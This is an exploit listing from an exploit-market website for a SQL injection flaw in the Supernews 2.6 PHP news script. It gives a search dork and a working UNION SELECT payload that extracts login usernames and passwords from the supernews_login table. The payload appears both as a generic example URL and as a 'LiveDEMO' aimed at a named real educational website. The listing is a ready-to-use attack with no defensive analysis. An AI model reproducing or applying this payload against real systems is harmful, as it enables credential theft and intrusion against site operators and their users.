[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Supernews 2.6 (index.php noticia) Remote SQL Injection Vulnerability

Author
DD3str0y3r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5305
Category
web applications
Date add
02-06-2009
Platform
unsorted
====================================================================
Supernews 2.6 (index.php noticia) Remote SQL Injection Vulnerability
====================================================================


###############################################################
	Supernews 2.6 SQL Injection Vulnability
###############################################################

Download: http://phpbrasil.com/script-download/vT0FaOCySSH/5817

###############################################################
	Discovered by Observing and DD3str0y3r
	   [Collaps3 CREW] - Made In Brazil
###############################################################

Dork: Supernews 2.6

#######################################################################################################################################

Example:
http://wwww.site.com/path/news_any_id=12+union+select+1,2,3,4,5,concat_ws(0x3a,user,pass),7,8+from+supernews_login--

LiveDEMO:
http://ead.saomateus.edu.br/supernews/index.php?noticia=10+union+select+1,2,3,4,5,concat_ws(0x3a,user,pass),7,8+from+supernews_login--

#######################################################################################################################################



#  0day.today [2024-11-15]  #